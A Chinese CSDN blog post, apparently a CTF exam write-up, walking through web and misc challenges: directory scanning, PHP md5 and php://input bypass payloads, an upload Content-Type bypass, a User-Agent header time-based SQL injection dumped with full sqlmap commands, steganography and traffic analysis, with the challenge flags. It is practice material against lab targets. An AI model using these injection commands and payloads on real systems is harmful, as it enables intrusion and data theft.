5.12期中考核复现

最新推荐文章于 2024-06-14 13:37:51 发布
最新推荐文章于 2024-06-14 13:37:51 发布
阅读量817 收藏 26
点赞数 19
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/138868486
版权

web

Web_SINGIN

签到题

源代码

渗透的本质

搜一下 渗透的本质是信息收集

附件里给了字典

用dirsearch扫一下

dirsearch -u http://172.16.17.6:7402/ -w robots.txt

找到index.phps

,id的输入值应该为admin,但是admin必须进行url编码,由于浏览器会进行一次url解码,所以如果想要服务器端进行一次url解码,则必须对admin进行两次url编码


好玩的PHP

前面两个就简单的md5绕过

参考这篇https://www.cnblogs.com/ainsliaea/p/15126218.html

后面两个值涉及到file_get_contents这个函数的绕过

file_get_contents()把整个文件读入一个字符串里。
语法:file_get_contents(path,include_path,context,start,max_length)
该函数是用于把文件的内容读入到一个字符串里的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。

php://input可以读取没有处理过的POST数据

所以构造payload

?a=s878926199a&b=s155964671a&c=aaa&d=php://input

简简单单的文件上传

只需要改变一下这个content-Type就行了

成功传上去

flag{94106152fb8ab204d7bff3bb13eb9e82}

简简单单的sql

先扫一下

寻找注入点

找到login.php

先fuzz一下什么回显都一样

猜测是时间盲注

但是又无法成功闭合

猜测注入点 不在这里

原来这里用的是sql头部注入 SQL注入——HTTP头部注入_http header 的sql注入-CSDN博客

使用sqlmap扫一下sqlmap学习(三)设置请求参数 - range1128 - 博客园 (cnblogs.com)

抓包后将请求头放到txt文件里面

 sqlmap -r '/home/lulu/桌面/sql' --level 3

还帮我们自动生成了一个payload

用这个payload去爆破数据库名

sqlmap -r '/home/lulu/桌面/sql' --level 3 --headers= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0' AND (SELECT 1525 FROM (SELECT(SLEEP(5)))IJxC)-- Akjd" --dbs

爆破表名

sqlmap -r '/home/lulu/桌面/sql' --level 3 --headers= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0' AND (SELECT 1525 FROM (SELECT(SLEEP(5)))IJxC)-- Akjd" -D challenges --tables

爆破列名

sqlmap -r '/home/lulu/桌面/sql' --level 3 --headers= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0' AND (SELECT 1525 FROM (SELECT(SLEEP(5)))IJxC)-- Akjd" -D challenges -T user_agents --cloumns

爆破字段

sqlmap -r '/home/lulu/桌面/sql' --level 3 --headers= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0' AND (SELECT 1525 FROM (SELECT(SLEEP(5)))IJxC)-- Akjd" -D challenges -T user_agents -C user_agent --dump

flag{8faf525dc3c4c7c43a9c163a57904c35}

Misc

Xjpg

F5去搜一下

安装F5-steganography和使用,及解决java环境版本报错问题-CSDN博客

找到这个隐写工具

跟着教程做就得了

但是这个java11的环境需要整一下

把output.txt拖进010

发现是个压缩包

解码后得到flag

flag{ad45f2-a52f3-ae956ff-ac4b2e}

流量分析1

把这个zip文件导出来

解压后得到6个文件

这个9850非常的眼熟

把6个txt文件合并为一个txt文件 十六进制粘贴到010里面

最后的文件尾也对上了

获得flag

流量分析2

过滤http流

我们发现他成功回显的长度是321

先ctrl+f找到爆破第一个字符串的包

所以过滤一下长度为321的包

然后已时间排序

从标记的下面就是flag字符串的aci码

flag{skysql_is_very_cool!233}

流量分析3

usb流量分析

长度为八个字节 应该为键盘流量

word的密码是

‘qazwsxedcrfv’

flag{685b42b0-da3d-47f4-a76c-0f3d07ea9604}

参考CTF流量分析常见题型(二)-USB流量_ctf usb流量分析-CSDN博客

层层迷雾

阿呆不呆@qq
关注
  • 19
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sscom5.12 sscom5.12 sscom5.12
04-27
sscom5.12 sscom5.12 sscom5.12
Jlink V5.12
02-11
Jlink V5.125.12版本的jlink驱动配合IAR EWAR,ADS,KEIL,WINARM,RealView等集成开发环境支持所有ARM7/ARM9/ARM11,Cortex M0/M1/M3/M4, Cortex A4/A8/A9等内核芯片的仿真,与IAR,Keil等编译环境无缝连接
ffmpeg5.12版本x86库
09-20
ffmpeg5.12版本x86库
Qt 5.12 LTS(长期维护版本)中Qt Quick的性能改进
luoyayun361的专栏
01-16 7602
我们一直致力于提高Qt的性能和优化其内存消耗。Qt 5.12的一个重点关注是在于减少QML引擎的内存消耗和优化JavaScript性能。 与上一个长期支持版Qt 5.6 LTS相比,Qt 5.9 LTS总体性能已经发生了明显改善。这都在一篇博客中进行了总结,它在64-bit ARM基础上分析了Qt 5.9 LTS版本中的Qt Quick 性能提升。在Qt 5.12 LTS中,我们更深入研究了QML...
Qt for Android-5.12环境搭建
大千世界
10-23 4068
去年刚开始配环境的时候,弄了好久,搞得也很乱,索性是配置好了。但是当时忘了记录下来,最近翻到亚飞大大的发的相关的帖子,在此转一个…… 友情提醒: QfA环境配置当中出现的问题往往是 JDK/SDK/NDK 版本不匹配,或者与系统位数不符导致的……换一下就OK了 参考:搭建Qt Android开发环境 ...
EtherCAT SSC V5.12
03-29
Ethercat从机协议栈代码工具5.12版,工具tool版本:1.4.2。
emWIN5.12中文手册.rar
07-28
STM32界面设计软件帮助文档emwin5.12中文文档,网上资料较少,版本虽然比较旧但主要功能都有说明。
安装qt5.12.12
adminstate的博客
03-19 3937
QT5.12.12安装及配置详解
Linux开发环境——CentOS7安装Qt5.12.12
天山老妖
10-10 9686
【代码】Linux开发环境——CentOS7安装Qt5.12.12。
qt5.12 linux版本,Qt 5.12 LTS发布下载,附新功能及更新内容
weixin_30446557的博客
05-02 1102
Qt 5.12 已经发布下载,这是一个 LTS 长期支持版本,使用 Qt 5.12 的用户将获得三年的技术支持。下面将为你介绍 Qt 5.12 的新功能及更新内容,同时,对比上一个 LTS 版本 5.9.7 ,Qt 5.12 修复了超过 2000 个 bug。若再往前,和 5.6.3 LTS 版本相比,Qt 5.12 修复了超过 5000 个 bug。Qt 开发团队表示将会在后续版本中不断提高 Q...
QT5.12 编译安装Qtxlsx
诗意亭序
10-26 694
1.下载Qtxlsx https://github.com/dbzhang800/QtXlsxWriter 2.打开qt命令控制台 3.进入qtxlsx 目录,依次之后三条命令 qmake mingw32-make mingw32-make install 4.运行Qtxlst官方例子 ...
QT5.12安装
分了个析的博客
05-23 1265
Windows(10): 1> VS2017(编译器) 官方下载 2> X64 Debuggers And Tools-x64_en-us.msi(调试器) CSDN下载 3> qt-opensource-windows-x86-5.12.3.exe 官方下载 Ubuntu(18.04.2): 1> qt-opensource-linux-x64-5.12.3.run(普通...
Wireshark TS | 应用传输丢包问题
7ACE的博客
06-09 754
Wireshark TS | 应用传输丢包问题
网络安全技术实验一 信息收集和漏洞扫描
zzzfff__的博客
06-09 986
了解信息搜集和漏洞扫描的一般步骤,利用Nmap等工具进行信息搜集并进行综合分析;掌握TCP全连接扫描、TCP SYN扫描的原理,利用Scapy编写网络应用程序,开发端口扫描功能模块;使用漏洞扫描工具发现漏洞并进行渗透测试。
工业网关在智能制造中的具体应用和效果-天拓四方
最新发布
2401_84969963的博客
06-14 525
通过对数据的处理和分析,我们可以获得设备的运行状态、生产效率、故障预警等信息,为企业提供决策支持和优化建议。未来,随着技术的不断进步和应用场景的拓展,工业网关将在智能制造领域发挥更加重要的作用,为企业创造更多的价值。网关设备通过有线或无线方式与生产设备进行连接,实时收集设备的运行状态、生产数据等信息,并将数据通过安全可靠的通信协议传输至企业的数据中心或云平台。通过工业网关的应用,企业实现了对生产设备的实时监控和数据分析,能够及时发现并解决设备故障和生产瓶颈,提高生产效率。
cs61C | lecture4
DaphneOdera17的博客
06-10 671
## Stack在最顶部,向下增长。包含局部变量和 function frame information。栈指针(SP, Stack Pointer) 告诉我们最低(当前)stack frame 在哪里。当进程结束时,SP 会移动回之前的位置,但是数据会保留(现在变成 garbage)。```ca(0);return 1;b(1);c(2);d(4);```!!以下错误代码:```cint y;y = 3;return &y;/* 3 *//*?*/
网络编程之XDP技术应用
fpcc的专栏
06-10 832
在上文中介绍了XDP技术,XDP技术的基本原理已经明白,但有一个问题,一个技术如何落地,如何在实际中应用?这就需要有一个承载其的具体的形式。举一个例子,网络编程一般使用Socket方式,那么能不能够在这种方式里使用XDP技术呢?答案是肯定的。 Linux在内核中提供了AF_XDP套接字编程,这就意味着,大部分的编程方式仍然可以以原来的套接字编程为主。这样的好处显而易见,对开发者和维护者来说,都是相对要容易理解和支持。AF_XDP类似于AF_NET(TCP/IP等)等一样,是一个协议族,大家有没有记得在TCP
智能驾驶时代:车联网需要怎样的智能网络底座?
syscloud123的博客
06-11 944
2024年,智能驾驶市场火热,无论是造车新势力还是老牌车企纷纷发力智能驾驶,他们深知,新能源汽车的下半场已到,再不发力智能驾驶,可能真的有些来不及了。车企不断加码单车智能的同时,政府也在稳步的推进车路协同。智能驾驶领域一直处在新技术广泛应用和验证的前沿,让我们一起探索智能驾驶的发展将给我们带来哪些启示。2024年年初,工业和信息化部、公安部等5部门印发,提出智能网联汽车“车路云一体化”协同发展的系列政策举措。
计网总结☞应用层
weixin_73223235的博客
06-09 1075
web版邮箱空间是有限制的,而Outlook、Outlook Express、Foxmail(客户端)将邮件收取到本地计算机硬盘上保存,这样就可以时刻预留足够的邮箱空间,查阅历史邮件高效。②QQ邮箱根据发送的邮件解析该邮件是否属于自己的帐户,若属于直接存放在自己的存储空间,若属于163邮箱,则QQ邮箱就将该邮件转发到163的服务器,转发使用的协议是SMTP;若本地域名服务器无法回答该请求,则此域名服务器就暂时成为DNS中的另一个客户,并向其他域名服务器发出查询请求,直至找到能够回答该请求的域名服务器为之;
qt5.12 android
07-15
Qt 5.12是Qt开发框架的一个版本,特别支持Android平台。Qt是一个跨平台的应用程序开发框架,可以用于开发各种类型的应用程序,包括移动应用。而Android是一个广泛使用的移动操作系统。 使用Qt 5.12开发Android应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值